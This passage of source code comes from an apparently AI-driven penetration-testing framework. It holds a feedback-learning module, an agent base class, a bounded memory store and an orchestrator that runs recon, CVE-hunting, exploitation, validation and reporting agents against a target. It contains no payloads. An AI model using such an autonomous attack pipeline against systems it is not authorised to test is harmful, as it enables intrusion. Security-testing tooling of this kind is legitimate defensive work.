domain_patterns = [p for p in patterns if p.domain == domain]
if domain_patterns:
relevant = domain_patterns
fp_patterns = [p for p in relevant if p.is_false_positive and p.confidence >= 0.6]
tp_patterns = [p for p in relevant if not p.is_false_positive and p.confidence >= 0.6]
if not fp_patterns and not tp_patterns:
return ""
parts = [f"\n## Adaptive Learning Context for {vuln_type}"]
if fp_patterns:
parts.append("### Known FALSE POSITIVE patterns (avoid these):")
for p in fp_patterns[:5]:
parts.append(f"- Endpoint pattern: {p.endpoint_pattern}")
if p.explanation_summary:
parts.append(f" Reason: {p.explanation_summary[:300]}")
if p.indicators:
parts.append(f" Indicators: {', '.join(p.indicators[:5])}")
parts.append(f" Confidence: {p.confidence:.0%} ({p.feedback_count} feedback reports)")
if tp_patterns:
parts.append("### Known TRUE POSITIVE patterns (be more aggressive):")
for p in tp_patterns[:5]:
parts.append(f"- Endpoint pattern: {p.endpoint_pattern}")
if p.explanation_summary:
parts.append(f" Details: {p.explanation_summary[:300]}")
parts.append(f" Confidence: {p.confidence:.0%} ({p.feedback_count} feedback reports)")
return "\n".join(parts)
def get_evaluation_hints(
self, vuln_type: str, endpoint: str, param: str = "", response_body: str = ""
) -> Dict:
"""Get hints for the ValidationJudge based on learned patterns."""
normalized = self._normalize_endpoint(endpoint)
patterns = self._patterns.get(vuln_type, [])
hints = {
"likely_false_positive": False,
"likely_true_positive": False,
"confidence_adjustment": 0,
"reason": "",
"pattern_match": False,
}
for pattern in patterns:
if pattern.endpoint_pattern == normalized:
hints["pattern_match"] = True
if pattern.is_false_positive and pattern.confidence >= 0.7:
hints["likely_false_positive"] = True
hints["confidence_adjustment"] = -int(pattern.confidence * 30)
hints["reason"] = f"Known FP pattern ({pattern.feedback_count} reports): {pattern.explanation_summary[:200]}"
elif not pattern.is_false_positive and pattern.confidence >= 0.7:
hints["likely_true_positive"] = True
hints["confidence_adjustment"] = int(pattern.confidence * 15)
hints["reason"] = f"Known TP pattern ({pattern.feedback_count} reports)"
break
return hints
def should_skip_test(self, vuln_type: str, endpoint: str, param: str = "") -> Tuple[bool, str]:
"""Check if this test should be skipped based on consistent FP feedback."""
normalized = self._normalize_endpoint(endpoint)
patterns = self._patterns.get(vuln_type, [])
for pattern in patterns:
if (pattern.endpoint_pattern == normalized and
pattern.is_false_positive and
pattern.feedback_count >= FP_THRESHOLD and
pattern.confidence >= 0.8):
return True, f"Skipped: {pattern.feedback_count}x FP feedback on {vuln_type} for this endpoint pattern"
return False, ""
def suggest_alternatives(self, vuln_type: str, domain: str = "") -> List[str]:
"""Suggest alternative attack approaches based on TP patterns."""
patterns = self._patterns.get(vuln_type, [])
suggestions = []
tp_patterns = [p for p in patterns if not p.is_false_positive]
if domain:
domain_tp = [p for p in tp_patterns if p.domain == domain]
if domain_tp:
tp_patterns = domain_tp
for p in tp_patterns[:3]:
if p.explanation_summary:
suggestions.append(f"Try approach from confirmed finding: {p.explanation_summary[:200]}")
if p.indicators:
suggestions.append(f"Focus on parameters: {', '.join(p.indicators[:3])}")
return suggestions
def get_stats(self) -> Dict:
"""Get learning statistics."""
stats = {}
for vuln_type, patterns in self._patterns.items():
fp_count = sum(1 for p in patterns if p.is_false_positive)
tp_count = sum(1 for p in patterns if not p.is_false_positive)
total_fb = sum(
1 for fb in self._feedback if fb.vuln_type == vuln_type
)
stats[vuln_type] = {
"fp_patterns": fp_count,
"tp_patterns": tp_count,
"total_feedback": total_fb,
}
return stats
def get_feedback_for_vuln(self, vuln_id: str) -> List[Dict]:
"""Get all feedback records for a specific vulnerability."""
return [asdict(fb) for fb in self._feedback if fb.vuln_id == vuln_id]
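The FP/TP recalculation in the pattern update can be illustrated in isolation. This is a minimal sketch, not the project's code: `summarize_feedback` is a hypothetical helper, and only the 0.6 threshold and the `max(fp_rate, 1 - fp_rate)` confidence rule are taken from the source.

```python
from typing import List, Tuple

FP_MAJORITY = 0.6  # threshold copied from the recalculation step in the source


def summarize_feedback(verdicts: List[bool]) -> Tuple[bool, float]:
    """Hypothetical helper: each verdict is True for a true-positive report.

    Returns (is_false_positive, confidence) using the same arithmetic as the
    pattern update: fp_rate = fp / total, confidence = max(fp_rate, 1 - fp_rate).
    """
    total = len(verdicts)
    if total == 0:
        # No feedback yet: neutral confidence (an assumption of this sketch).
        return False, 0.5
    fp_count = sum(1 for v in verdicts if not v)
    fp_rate = fp_count / total
    return fp_rate >= FP_MAJORITY, max(fp_rate, 1.0 - fp_rate)
```

Under this rule, confidence measures how one-sided the feedback is, regardless of direction: an even split yields 0.5, and a pattern is only labelled a false positive once at least 60% of its reports say so.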
@@ -1,179 +0,0 @@
"""
NeuroSploit v3 - Specialist Agent Base Class
Base class for all specialist sub-agents in the multi-agent system.
Inspired by CAI framework's Agent pattern with handoff support,
budget tracking, and shared memory access.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
@dataclass
class AgentResult:
"""Result from a specialist agent execution."""
agent_name: str
status: str = "pending" # pending, running, completed, failed, cancelled
findings: List[Any] = field(default_factory=list)
data: Dict[str, Any] = field(default_factory=dict)
tasks_completed: int = 0
tokens_used: int = 0
duration: float = 0.0
error: str = ""
handoff_to: str = "" # Agent name to hand off to
handoff_context: Dict = field(default_factory=dict)
class SpecialistAgent:
"""Base class for specialist sub-agents.
Each specialist agent has:
- A name and role description
- Access to shared memory (AgentMemory)
- A token budget allocation
- Handoff capability to transfer work to another agent
- Tool exposure (as_tool) for orchestrator use
"""
def __init__(
self,
name: str,
llm=None,
memory=None,
budget_allocation: float = 0.0,
budget=None,
):
self.name = name
self.llm = llm
self.memory = memory
self.budget_allocation = budget_allocation
self.budget = budget
self.findings: List[Any] = []
self.tasks_completed: int = 0
self.tokens_used: int = 0
self._status = "idle"
self._start_time: float = 0.0
self._cancel_event = asyncio.Event()
async def run(self, context: Dict) -> AgentResult:
"""Main execution loop — override in subclasses.
Args:
context: Dict with target info, recon data, prior findings, etc.
Returns:
AgentResult with findings, data, and optional handoff.
"""
raise NotImplementedError(f"{self.name} must implement run()")
async def execute(self, context: Dict) -> AgentResult:
"""Wrapper that handles timing, error catching, and status updates."""
self._status = "running"
self._start_time = time.time()
self._cancel_event.clear()
result = AgentResult(agent_name=self.name, status="running")
try:
result = await self.run(context)
result.status = "completed"
except asyncio.CancelledError:
result.status = "cancelled"
result.error = "Agent cancelled"
except Exception as e:
result.status = "failed"
result.error = str(e)
logger.error(f"Agent {self.name} failed: {e}")
result.duration = time.time() - self._start_time
result.tokens_used = self.tokens_used
result.tasks_completed = self.tasks_completed
self._status = result.status
return result
def cancel(self):
"""Signal the agent to stop."""
self._cancel_event.set()
@property
def is_cancelled(self) -> bool:
return self._cancel_event.is_set()
async def handoff_to(
self,
target_agent: 'SpecialistAgent',
context: Dict,
) -> AgentResult:
"""Transfer task to another specialist agent.
The receiving agent gets full context from the sender.
"""
handoff_context = {
"from_agent": self.name,
"findings_so_far": self.findings,
"tokens_used": self.tokens_used,
**context,
}
logger.info(f"Handoff: {self.name} -> {target_agent.name}")
return await target_agent.execute(handoff_context)
def as_tool(self) -> Dict:
"""Expose this agent as a callable tool for the orchestrator.
Returns a dict compatible with LLM tool/function calling.
"""
return {
"name": f"agent_{self.name}",
"description": f"Specialist {self.name} agent",
"parameters": {
"type": "object",
"properties": {
"context": {
"type": "string",
"description": "Task context for the agent",
}
},
},
"handler": self.execute,
}
def get_status(self) -> Dict:
"""Dashboard-friendly status."""
elapsed = time.time() - self._start_time if self._start_time else 0
return {
"name": self.name,
"status": self._status,
"tasks_completed": self.tasks_completed,
"findings_count": len(self.findings),
"tokens_used": self.tokens_used,
"budget_allocation": self.budget_allocation,
"elapsed": round(elapsed, 1),
}
async def _llm_call(self, prompt: str, category: str = "analysis",
estimated_tokens: int = 500) -> Optional[str]:
"""Helper: make an LLM call with budget tracking."""
if not self.llm or not hasattr(self.llm, "generate"):
return None
if self.budget and not self.budget.can_spend(category, estimated_tokens):
logger.debug(f"Agent {self.name}: budget exhausted for {category}")
return None
try:
result = await self.llm.generate(prompt)
if self.budget:
self.budget.record(category, estimated_tokens,
f"agent_{self.name}_{category}")
self.tokens_used += estimated_tokens
return result
except Exception as e:
logger.debug(f"Agent {self.name} LLM call failed: {e}")
return None
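The `execute()` wrapper pattern used by the base class (timing, status updates, and turning exceptions into a result object) can be sketched on its own. Everything below is illustrative: `MiniResult`, `guarded_run`, `ok` and `boom` are hypothetical names, and `MiniResult` carries only the fields this sketch needs.

```python
import asyncio
import time
from dataclasses import dataclass
from typing import Awaitable, Callable, Dict


@dataclass
class MiniResult:
    """Illustrative stand-in for AgentResult (subset of fields)."""
    status: str = "pending"
    error: str = ""
    duration: float = 0.0


async def guarded_run(
    run: Callable[[Dict], Awaitable[MiniResult]], context: Dict
) -> MiniResult:
    """Await `run`, recording status, error text and wall-clock duration."""
    start = time.time()
    result = MiniResult(status="running")
    try:
        result = await run(context)
        result.status = "completed"
    except asyncio.CancelledError:
        # Mirrors the source: cancellation is reported, not re-raised.
        result.status = "cancelled"
        result.error = "Agent cancelled"
    except Exception as exc:
        result.status = "failed"
        result.error = str(exc)
    result.duration = time.time() - start
    return result


async def ok(context: Dict) -> MiniResult:
    return MiniResult()


async def boom(context: Dict) -> MiniResult:
    raise ValueError("target unreachable")
```

Because the wrapper never raises for ordinary failures, a caller can inspect `status` and `error` instead of wrapping every agent call in its own `try` block.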
@@ -1,401 +0,0 @@
"""
NeuroSploit v3 - Agent Memory Management
Bounded, deduplicated memory architecture for the autonomous agent.
Replaces ad-hoc self.findings / self.tested_payloads with structured,
eviction-aware data stores.
Inspired by XBOW benchmark methodology: every finding must have
real HTTP evidence, duplicates are suppressed, baselines are cached.
"""
import hashlib
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from typing import Dict, List, Optional, Any, Set
from collections import OrderedDict
from urllib.parse import urlparse
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class TestedCombination:
"""Record of a (url, param, vuln_type) test attempt"""
url: str
param: str
vuln_type: str
payloads_used: List[str] = field(default_factory=list)
was_vulnerable: bool = False
tested_at: str = ""
def __post_init__(self):
if not self.tested_at:
self.tested_at = datetime.utcnow().isoformat()
@dataclass
class EndpointFingerprint:
"""Fingerprint of an endpoint's normal response"""
url: str
status_code: int = 0
content_type: str = ""
body_length: int = 0
body_hash: str = ""
server_header: str = ""
powered_by: str = ""
error_patterns: List[str] = field(default_factory=list)
tech_headers: Dict[str, str] = field(default_factory=dict)
fingerprinted_at: str = ""
def __post_init__(self):
if not self.fingerprinted_at:
self.fingerprinted_at = datetime.utcnow().isoformat()
@dataclass
class RejectedFinding:
"""Audit trail for rejected findings"""
finding_hash: str
vuln_type: str
endpoint: str
param: str
reason: str
rejected_at: str = ""
def __post_init__(self):
if not self.rejected_at:
self.rejected_at = datetime.utcnow().isoformat()
# ---------------------------------------------------------------------------
# Speculative language patterns (anti-hallucination)
# ---------------------------------------------------------------------------
SPECULATIVE_PATTERNS = re.compile(
r"\b(could be|might be|may be|theoretically|potentially vulnerable|"
r"possibly|appears to be vulnerable|suggests? (a )?vulnerab|"
r"it is possible|in theory|hypothetically)\b",
re.IGNORECASE
)
# ---------------------------------------------------------------------------
# AgentMemory
# ---------------------------------------------------------------------------
class AgentMemory:
"""
Bounded memory store for the autonomous agent.
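Every container has a hard cap. When a dictionary store or the rejected-findings
list exceeds its cap, the oldest entries (25% of the cap) are evicted in insertion
order; baselines are moved to the end on read. Confirmed findings are never
evicted: new ones are refused once MAX_CONFIRMED is reached.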
"""
# Capacity limits
MAX_TESTED = 10_000
MAX_BASELINES = 500
MAX_FINGERPRINTS = 500
MAX_CONFIRMED = 200
MAX_REJECTED = 500
# Domain-scoped types: only 1 finding per domain (not per URL)
DOMAIN_SCOPED_TYPES = {
# Infrastructure / headers
"security_headers", "clickjacking", "insecure_http_headers",
"missing_xcto", "missing_csp", "missing_hsts",
"missing_referrer_policy", "missing_permissions_policy",
"cors_misconfig", "insecure_cors_policy", "ssl_issues", "weak_tls_config",
"http_methods", "unrestricted_http_methods",
# Server config
"debug_mode", "debug_mode_enabled", "verbose_error_messages",
"directory_listing", "directory_listing_enabled",
"exposed_admin_panel", "exposed_api_docs", "insecure_cookie_flags",
# Data exposure
"cleartext_transmission", "sensitive_data_exposure",
"information_disclosure", "version_disclosure",
"weak_encryption", "weak_hashing", "weak_random",
# Auth config
"missing_mfa", "weak_password_policy", "weak_password",
# Cloud/API
"graphql_introspection", "rest_api_versioning", "api_rate_limiting",
}
def __init__(self):
# Core stores (OrderedDict for eviction order)
self.tested_combinations: OrderedDict[str, TestedCombination] = OrderedDict()
self.baseline_responses: OrderedDict[str, dict] = OrderedDict()
self.endpoint_fingerprints: OrderedDict[str, EndpointFingerprint] = OrderedDict()
# Findings
self.confirmed_findings: List[Any] = [] # List[Finding] - uses agent's Finding dataclass
self._finding_hashes: Set[str] = set() # fast dedup lookup
# Audit trail
self.rejected_findings: List[RejectedFinding] = []
# Technology stack detected across all endpoints
self.technology_stack: Dict[str, str] = {} # e.g. {"server": "Apache", "x-powered-by": "PHP/8.1"}
# ------------------------------------------------------------------
# Tested-combination tracking
# ------------------------------------------------------------------
@staticmethod
def _test_key(url: str, param: str, vuln_type: str) -> str:
"""Deterministic key for a (url, param, vuln_type) tuple"""
return hashlib.sha256(f"{url}|{param}|{vuln_type}".encode()).hexdigest()
def was_tested(self, url: str, param: str, vuln_type: str) -> bool:
"""Check whether this combination was already tested"""
return self._test_key(url, param, vuln_type) in self.tested_combinations
def record_test(
self, url: str, param: str, vuln_type: str,
payloads: List[str], was_vulnerable: bool = False
):
"""Record a completed test"""
key = self._test_key(url, param, vuln_type)
self.tested_combinations[key] = TestedCombination(
url=url, param=param, vuln_type=vuln_type,
payloads_used=payloads[:10], # store up to 10 payloads
was_vulnerable=was_vulnerable,
)
self._enforce_limit(self.tested_combinations, self.MAX_TESTED)
# ------------------------------------------------------------------
# Baseline caching
# ------------------------------------------------------------------
@staticmethod
def _baseline_key(url: str) -> str:
"""Key for baseline storage (strip query params for reuse)"""
parsed = urlparse(url)
return f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
def store_baseline(self, url: str, response: dict):
"""Cache a baseline (clean) response for a URL"""
key = self._baseline_key(url)
body = response.get("body", "")
self.baseline_responses[key] = {
"status": response.get("status", 0),
"content_type": response.get("content_type", ""),
"body_length": len(body),
"body_hash": hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
"body": body[:5000], # store first 5k chars for comparison
"headers": response.get("headers", {}),
"fetched_at": datetime.utcnow().isoformat(),
}
self._enforce_limit(self.baseline_responses, self.MAX_BASELINES)
def get_baseline(self, url: str) -> Optional[dict]:
"""Retrieve cached baseline for a URL"""
key = self._baseline_key(url)
baseline = self.baseline_responses.get(key)
if baseline:
# Move to end (mark as recently used)
self.baseline_responses.move_to_end(key)
return baseline
# ------------------------------------------------------------------
# Endpoint fingerprinting
# ------------------------------------------------------------------
def store_fingerprint(self, url: str, response: dict):
"""Extract and store endpoint fingerprint from a response"""
key = self._baseline_key(url)
headers = response.get("headers", {})
body = response.get("body", "")
# Detect error patterns in the body
error_patterns = []
error_regexes = [
r"(?:sql|database|query)\s*(?:error|syntax|exception)",
r"(?:warning|fatal|parse)\s*(?:error|exception)",
r"stack\s*trace",
r"traceback\s*\(most recent",
r"<b>(?:Warning|Fatal error|Notice)</b>",
r"Internal Server Error",
]
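# Match case-insensitively against the raw body: several patterns contain
# uppercase literals and would never match a lowercased copy.
for pat in error_regexes:
if body and re.search(pat, body, re.IGNORECASE):
error_patterns.append(pat)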
fp = EndpointFingerprint(
url=url,
status_code=response.get("status", 0),
content_type=response.get("content_type", ""),
body_length=len(body),
body_hash=hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
server_header=headers.get("server", headers.get("Server", "")),
powered_by=headers.get("x-powered-by", headers.get("X-Powered-By", "")),
error_patterns=error_patterns,
tech_headers={
k: v for k, v in headers.items()
if k.lower() in (
"server", "x-powered-by", "x-aspnet-version",
"x-generator", "x-drupal-cache", "x-framework",
)
},
)
self.endpoint_fingerprints[key] = fp
self._enforce_limit(self.endpoint_fingerprints, self.MAX_FINGERPRINTS)
# Update global tech stack
if fp.server_header:
self.technology_stack["server"] = fp.server_header
if fp.powered_by:
self.technology_stack["x-powered-by"] = fp.powered_by
for k, v in fp.tech_headers.items():
self.technology_stack[k.lower()] = v
def get_fingerprint(self, url: str) -> Optional[EndpointFingerprint]:
"""Retrieve fingerprint for a URL"""
key = self._baseline_key(url)
return self.endpoint_fingerprints.get(key)
# ------------------------------------------------------------------
# Finding management (dedup + bounded)
# ------------------------------------------------------------------
@staticmethod
def _finding_hash(finding) -> str:
"""Compute dedup hash for a finding.
For domain-scoped types, uses scheme://netloc instead of full URL
so the same missing header isn't reported per-URL.
"""
vuln_type = finding.vulnerability_type
endpoint = finding.affected_endpoint
if vuln_type in AgentMemory.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{finding.parameter}"
return hashlib.sha256(raw.encode()).hexdigest()
def _find_existing(self, finding) -> Optional[Any]:
"""Find an existing confirmed finding with the same dedup hash."""
fh = self._finding_hash(finding)
if fh not in self._finding_hashes:
return None
for f in self.confirmed_findings:
if self._finding_hash(f) == fh:
return f
return None
def add_finding(self, finding) -> bool:
"""
Add a confirmed finding. Returns False if:
- duplicate (same vuln_type + endpoint + param)
- at capacity
- evidence is missing or speculative
For domain-scoped types, duplicates append the URL to
the existing finding's affected_urls list instead.
"""
fh = self._finding_hash(finding)
# Dedup check — for domain-scoped types, merge URLs
if fh in self._finding_hashes:
if finding.vulnerability_type in self.DOMAIN_SCOPED_TYPES:
existing = self._find_existing(finding)
if existing and hasattr(existing, "affected_urls"):
url = finding.affected_endpoint
if url and url not in existing.affected_urls:
existing.affected_urls.append(url)
return False
# Capacity check
if len(self.confirmed_findings) >= self.MAX_CONFIRMED:
return False
# Evidence quality check
if not finding.evidence and not finding.response:
return False
# Speculative language check
if finding.evidence and SPECULATIVE_PATTERNS.search(finding.evidence):
self.reject_finding(finding, "Speculative language in evidence")
return False
self.confirmed_findings.append(finding)
self._finding_hashes.add(fh)
return True
def reject_finding(self, finding, reason: str):
"""Record a rejected finding for audit"""
self.rejected_findings.append(RejectedFinding(
finding_hash=self._finding_hash(finding),
vuln_type=getattr(finding, "vulnerability_type", "unknown"),
endpoint=getattr(finding, "affected_endpoint", ""),
param=getattr(finding, "parameter", ""),
reason=reason,
))
if len(self.rejected_findings) > self.MAX_REJECTED:
# Evict oldest 25%
cut = self.MAX_REJECTED // 4
self.rejected_findings = self.rejected_findings[cut:]
def has_finding_for(self, vuln_type: str, endpoint: str, param: str = "") -> bool:
"""Check if a confirmed finding already exists for this combo.
Uses domain-scoped key for domain-scoped types.
"""
if vuln_type in self.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{param}"
fh = hashlib.sha256(raw.encode()).hexdigest()
return fh in self._finding_hashes
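The domain-scoped dedup key shared by `_finding_hash` and `has_finding_for` can be sketched as a standalone function. This is an illustration under assumptions: `dedup_key` and the two-element `DOMAIN_SCOPED` set are hypothetical, and the real set is `DOMAIN_SCOPED_TYPES`.

```python
import hashlib
from urllib.parse import urlparse

# Small illustrative subset; the real list is DOMAIN_SCOPED_TYPES.
DOMAIN_SCOPED = {"missing_hsts", "clickjacking"}


def dedup_key(vuln_type: str, endpoint: str, param: str = "") -> str:
    """Hash (vuln_type, scope, param).

    For domain-scoped types the scope is scheme://netloc, so every URL on
    the same origin collapses to one key; otherwise it is the full endpoint.
    """
    if vuln_type in DOMAIN_SCOPED:
        parsed = urlparse(endpoint)
        scope = f"{parsed.scheme}://{parsed.netloc}"
    else:
        scope = endpoint
    return hashlib.sha256(f"{vuln_type}|{scope}|{param}".encode()).hexdigest()
```

With this key, a missing HSTS header seen on two paths of the same host produces a single finding, while an injection issue on two different endpoints stays as two findings.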
# ------------------------------------------------------------------
# Eviction helper
# ------------------------------------------------------------------
@staticmethod
def _enforce_limit(od: OrderedDict, limit: int):
"""Evict oldest 25% when limit is exceeded"""
if len(od) <= limit:
return
to_remove = limit // 4
for _ in range(to_remove):
od.popitem(last=False) # pop oldest
# ------------------------------------------------------------------
# Stats / introspection
# ------------------------------------------------------------------
def stats(self) -> dict:
"""Return memory usage statistics"""
return {
"tested_combinations": len(self.tested_combinations),
"baseline_responses": len(self.baseline_responses),
"endpoint_fingerprints": len(self.endpoint_fingerprints),
"confirmed_findings": len(self.confirmed_findings),
"rejected_findings": len(self.rejected_findings),
"technology_stack": dict(self.technology_stack),
"limits": {
"tested": self.MAX_TESTED,
"baselines": self.MAX_BASELINES,
"fingerprints": self.MAX_FINGERPRINTS,
"confirmed": self.MAX_CONFIRMED,
"rejected": self.MAX_REJECTED,
},
}
def clear(self):
"""Reset all memory stores"""
self.tested_combinations.clear()
self.baseline_responses.clear()
self.endpoint_fingerprints.clear()
self.confirmed_findings.clear()
self._finding_hashes.clear()
self.rejected_findings.clear()
self.technology_stack.clear()
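The bounded-store behaviour of `_enforce_limit` can be tried out with a plain `OrderedDict`. The sketch below is a hedged re-statement of that helper, not a replacement for it: `enforce_limit`, `cache` and the cap of 8 are illustrative choices.

```python
from collections import OrderedDict


def enforce_limit(store: OrderedDict, limit: int) -> int:
    """Evict the oldest `limit // 4` entries once `store` exceeds `limit`.

    Returns the number of evicted entries.
    """
    if len(store) <= limit:
        return 0
    to_remove = limit // 4
    for _ in range(to_remove):
        store.popitem(last=False)  # last=False pops the oldest insertion
    return to_remove


cache: OrderedDict = OrderedDict()
for i in range(9):  # cap of 8, so the ninth insert triggers one eviction pass
    cache[f"url-{i}"] = i
    enforce_limit(cache, limit=8)
```

Evicting a quarter of the cap at once, rather than one entry per insert, keeps the eviction cost amortised. Note that for caps below 4 the integer division yields 0, so nothing is evicted; the caps used in the source are all well above that.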
@@ -1,342 +0,0 @@
"""
NeuroSploit v3 - Multi-Agent Orchestrator
Coordinates specialist agents in a CAI-inspired pattern:
Phase 1: Parallel — ReconAgent + CVEHunterAgent
Phase 2: Sequential — ExploitAgent (consumes recon output)
Phase 3: Parallel — ValidatorAgent + ReportAgent
Manages handoffs, shared memory, and progress tracking.
Enabled via ENABLE_MULTI_AGENT=true in .env.
"""
import asyncio
import logging
import time
from typing import Any, Dict, List, Optional
from core.agent_base import SpecialistAgent, AgentResult
logger = logging.getLogger(__name__)
# Lazy imports
_specialist = None
def _get_specialist_module():
global _specialist
if _specialist is None:
try:
from core import specialist_agents
_specialist = specialist_agents
except ImportError:
_specialist = False
return _specialist if _specialist else None
class AgentOrchestrator:
"""Coordinates specialist agents with handoff routing.
Three execution phases:
1. Intelligence gathering (Recon + CVE Hunter in parallel)
2. Exploitation (ExploitAgent with enriched recon)
3. Validation and reporting (Validator + Reporter in parallel)
Handoff rules route output from one agent as input to the next.
Shared memory allows agents to see each other's findings.
"""
def __init__(
self,
llm=None,
memory=None,
budget=None,
request_engine=None,
config: Optional[Dict] = None,
):
self.llm = llm
self.memory = memory
self.budget = budget
self.request_engine = request_engine
self.config = config or {}
self._agents: Dict[str, SpecialistAgent] = {}
self._results: Dict[str, AgentResult] = {}
self._phase = "idle"
self._start_time: float = 0.0
self._cancel_event = asyncio.Event()
self._progress_callback = None
self._init_agents()
def _init_agents(self):
"""Initialize specialist agents with budget allocations."""
spec = _get_specialist_module()
if not spec:
logger.warning("Specialist agents module not available")
return
budget_splits = self.config.get("budget_splits", {
"recon": 0.20,
"exploit": 0.35,
"validator": 0.20,
"cve_hunter": 0.10,
"reporter": 0.15,
})
self._agents = {
"recon": spec.ReconAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("recon", 0.20),
budget=self.budget, request_engine=self.request_engine,
),
"exploit": spec.ExploitAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("exploit", 0.35),
budget=self.budget, request_engine=self.request_engine,
),
"validator": spec.ValidatorAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("validator", 0.20),
budget=self.budget, request_engine=self.request_engine,
),
"cve_hunter": spec.CVEHunterAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("cve_hunter", 0.10),
budget=self.budget, request_engine=self.request_engine,
),
"reporter": spec.ReportAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("reporter", 0.15),
budget=self.budget,
),
}
def set_progress_callback(self, callback):
"""Set callback for progress updates: callback(phase, pct, message)."""
self._progress_callback = callback
def _progress(self, phase: str, pct: float, message: str):
"""Report progress."""
self._phase = phase
if self._progress_callback:
try:
self._progress_callback(phase, pct, message)
except Exception:
pass
async def run(
self,
target: str,
recon_data: Any = None,
initial_context: Optional[Dict] = None,
) -> Dict:
"""Run the full multi-agent pipeline.
Args:
target: Target URL
recon_data: Existing ReconData object (if available)
initial_context: Additional context (headers, body, technologies)
Returns:
Dict with all findings, agent results, and statistics.
"""
self._start_time = time.time()
self._cancel_event.clear()
context = dict(initial_context or {})  # shallow copy so the caller's dict is not mutated
context["target"] = target
# Extract basic info from recon_data
if recon_data:
context.setdefault("headers", getattr(recon_data, "headers", {}))
context.setdefault("body", getattr(recon_data, "body", ""))
context.setdefault("technologies",
getattr(recon_data, "technologies", []))
context.setdefault("endpoints",
getattr(recon_data, "endpoints", []))
all_findings = []
pipeline_results = {}
# ── Phase 1: Intelligence Gathering (Parallel) ──
self._progress("phase1_intel", 0.0, "Starting intelligence gathering")
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
phase1_tasks = []
if "recon" in self._agents:
phase1_tasks.append(
("recon", self._agents["recon"].execute(context))
)
if "cve_hunter" in self._agents:
phase1_tasks.append(
("cve_hunter", self._agents["cve_hunter"].execute(context))
)
if phase1_tasks:
results = await asyncio.gather(
*[task for _, task in phase1_tasks],
return_exceptions=True,
)
for (name, _), res in zip(phase1_tasks, results):
if isinstance(res, Exception):
logger.error(f"Phase 1 agent {name} failed: {res}")
pipeline_results[name] = AgentResult(
agent_name=name, status="failed", error=str(res)
)
else:
pipeline_results[name] = res
all_findings.extend(res.findings)
# Merge discovered endpoints into context
if name == "recon" and res.data.get("discovered_endpoints"):
existing = context.get("endpoints", [])
context["endpoints"] = list(set(
existing + res.data["discovered_endpoints"]
))
if name == "recon" and res.data.get("version_findings"):
context["versions"] = res.data["version_findings"]
self._progress("phase1_intel", 0.30,
f"Intel complete: {len(context.get('endpoints', []))} endpoints")
# ── Phase 2: Exploitation (Sequential) ──
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
self._progress("phase2_exploit", 0.30, "Starting exploitation phase")
if "exploit" in self._agents:
exploit_result = await self._agents["exploit"].execute(context)
pipeline_results["exploit"] = exploit_result
all_findings.extend(exploit_result.findings)
self._progress("phase2_exploit", 0.65,
f"Exploitation complete: {len(all_findings)} findings")
# ── Phase 3: Validation + Reporting (Parallel) ──
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
self._progress("phase3_validate", 0.65, "Starting validation and reporting")
phase3_context = {**context, "findings": all_findings}
phase3_tasks = []
if "validator" in self._agents and all_findings:
phase3_tasks.append(
("validator", self._agents["validator"].execute(phase3_context))
)
if "reporter" in self._agents and all_findings:
report_ctx = {**phase3_context, "recon_data": recon_data}
phase3_tasks.append(
("reporter", self._agents["reporter"].execute(report_ctx))
)
if phase3_tasks:
results = await asyncio.gather(
*[task for _, task in phase3_tasks],
return_exceptions=True,
)
for (name, _), res in zip(phase3_tasks, results):
if isinstance(res, Exception):
logger.error(f"Phase 3 agent {name} failed: {res}")
pipeline_results[name] = AgentResult(
agent_name=name, status="failed", error=str(res)
)
else:
pipeline_results[name] = res
# Validator may filter findings
if name == "validator" and res.findings:
all_findings = res.findings
self._progress("complete", 1.0,
f"Pipeline complete: {len(all_findings)} validated findings")
return self._build_result(all_findings, pipeline_results)
def _build_result(
self,
findings: List,
agent_results: Dict[str, AgentResult],
) -> Dict:
"""Build final pipeline result."""
elapsed = time.time() - self._start_time if self._start_time else 0
total_tokens = sum(
r.tokens_used for r in agent_results.values()
if isinstance(r, AgentResult)
)
total_tasks = sum(
r.tasks_completed for r in agent_results.values()
if isinstance(r, AgentResult)
)
return {
"findings": findings,
"findings_count": len(findings),
"agent_results": {
name: {
"status": r.status,
"findings_count": len(r.findings),
"tasks_completed": r.tasks_completed,
"tokens_used": r.tokens_used,
"duration": round(r.duration, 1),
"error": r.error,
}
for name, r in agent_results.items()
if isinstance(r, AgentResult)
},
"total_tokens": total_tokens,
"total_tasks": total_tasks,
"duration": round(elapsed, 1),
"phase": self._phase,
}
def cancel(self):
"""Cancel all running agents."""
self._cancel_event.set()
for agent in self._agents.values():
agent.cancel()
def get_agents_status(self) -> List[Dict]:
"""Get status of all agents for dashboard."""
return [agent.get_status() for agent in self._agents.values()]
async def reason_about_handoff(
self,
current_agent: str,
result: AgentResult,
) -> Optional[str]:
"""Use AI to decide which agent should handle next.
Falls back to explicit handoff_to in AgentResult.
"""
if result.handoff_to:
return result.handoff_to
if not self.llm or not hasattr(self.llm, "generate"):
return None
try:
prompt = f"""Given the output of the {current_agent} agent:
- Status: {result.status}
- Findings: {len(result.findings)}
- Data keys: {list(result.data.keys())}
Which agent should handle the next step?
Options: recon, exploit, validator, cve_hunter, reporter, none
Reply with ONLY the agent name."""
answer = await self.llm.generate(prompt)
if answer:
answer = answer.strip().lower()
if answer in self._agents:
return answer
except Exception:
pass
return None
